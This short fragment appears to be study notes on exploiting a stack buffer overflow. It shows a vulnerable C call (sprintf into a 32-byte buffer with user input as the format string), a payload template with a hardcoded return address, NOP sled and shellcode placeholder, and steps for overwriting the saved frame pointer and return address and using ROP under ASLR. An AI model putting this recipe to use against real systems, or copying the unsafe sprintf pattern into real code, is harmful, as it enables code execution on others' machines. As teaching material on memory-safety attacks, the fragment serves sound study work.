char buf[32];
sprintf(buf, user);
%36u\\x3c\\xd3\\xff\\xbf<nops><shellcode>
Write 36 bytes (overwrite buf and ebp).
Write return address, use nops, then shell code.
ASLR, so we can’t have a /bin/sh string ptr. However, we can use ROPs to calculate where /bin/sh is.